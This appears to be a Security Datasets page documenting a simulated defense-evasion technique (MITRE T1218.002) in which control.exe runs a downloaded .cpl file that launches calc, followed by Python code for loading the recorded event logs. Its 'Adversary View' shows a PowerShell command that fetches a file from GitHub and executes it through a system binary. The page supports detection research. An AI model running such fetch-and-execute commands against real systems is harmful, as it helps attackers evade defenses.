Control Panel Execution#

Metadata#

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/22

Modification Date

2020/10/22

Tactics

TA0005

Techniques

T1218.002

Tags

art.037e9d8a-9e46-4255-8b33-2ae3b545ca6f

Dataset Description#

This dataset represents threat actors leveraging control.exe to execute a .cpl file to proxy execute another payload (i.e. calc).

Simulation Metadata#

Tools#

type

Name

Module

Manual

powershell

powershell

Adversary View#

Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile C:\ProgramData\calc.cpl
control.exe C:\ProgramData\calc.cpl

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_control_panel_execution.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)